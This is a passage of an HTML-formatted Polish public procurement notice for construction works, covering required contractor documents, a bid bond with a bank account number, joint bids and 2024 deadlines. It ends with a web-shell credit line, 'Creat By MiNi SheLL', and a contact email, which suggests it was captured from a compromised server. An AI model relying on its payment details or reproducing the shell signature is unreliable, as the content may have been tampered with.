postępowaniu<br/>Wykonawca będzie zobowiązany przedłożyć (na wezwanie):<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty przy czym dowodami, o których mowa są:<br/>a) referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego roboty<br/>były wykonane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane;<br/>b) oświadczenie wykonawcy - jeżeli z uzasadnionej przyczyny o obiektywnym charakterze,<br/>wykonawca nie jest w stanie uzyskać dokumentów ww.<br/>W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż<br/>3 miesiące przed upływem terminu składania ofert; (Wzór – Załącznik nr 6 do SWZ).<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia,<br/>odpowiedzialnych za kierowanie robotami w branży konstrukcyjno-budowlanej, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia,<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności, oraz informacji o podstawie dysponowania tymi osobami; (Wzór – Załącznik nr 7 do<br/>SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium:<br/>1) Zamawiający określa kwotę wadium w wysokości 5 000,00 zł;<br/>2) Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98<br/>ust. 1 pkt 2 i 3 oraz ust. 2 P.z.p.;<br/>3) wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku<br/>następujących formach:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572);<br/>4) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr<br/>08 8076 0001 0000 1339 2000 0010;<br/>5) Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3<br/>lit. b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej;<br/>6) Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od<br/>dnia wystąpienia jednej z okoliczności:<br/>a) upływu terminu związania ofertą,<br/>b) zawarcia umowy w sprawie zamówienia publicznego,<br/>c) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie<br/>zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do<br/>jego wniesienia;<br/>7) Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia<br/>wniosku zwraca wadium wykonawcy:<br/>a) który wycofał ofertę przed upływem terminu składania ofert,<br/>b) którego oferta została odrzucona,<br/>c) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została<br/>wybrana jako najkorzystniejsza,<br/>d) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte<br/>odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia;<br/>8) Złożenie wniosku o zwrot wadium, o którym mowa w pkt 7, powoduje rozwiązanie<br/>stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale IX P.zp;<br/>9) Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z<br/>umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty<br/>prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na<br/>rachunek bankowy wskazany przez wykonawcę;<br/>10) Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium;<br/>11) Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego<br/>w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 Pzp, występuje<br/>odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>a) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128<br/>ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków<br/>dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności,<br/>o których mowa w art. 57 lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art.<br/>125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie<br/>omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości<br/>wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,<br/>b) wykonawca, którego oferta została wybrana:<br/>- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w ofercie,<br/>- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Składanie ofert przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia:<br/>1) wykonawcy mogą wspólnie ubiegać się o zamówienie publiczne. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego (pełnomocnictwo należy dołączyć do oferty);<br/>2) dokument pełnomocnictwa określający jego zakres powinien być przedłożony<br/>w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza i podpisany<br/>przez mocodawcę (osobę fizyczną lub osoby reprezentujące osobę prawną);<br/>3) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem<br/>występującym jako reprezentant pozostałych – pełnomocnikiem;<br/>4) wypełniając formularz ofertowy oraz inne dokumenty powołujące się na „Wykonawcę”<br/>w miejscu „nazwa i adres Wykonawcy” należy wpisać dane dotyczące Wykonawców<br/>wspólnie ubiegających się o zamówienie;<br/>5) wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z § 13 projekt umowy stanowiącym załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w formie elektronicznej lub w postaci elektronicznej jak opisano w rozdz. VIII SWZ,</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-26</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com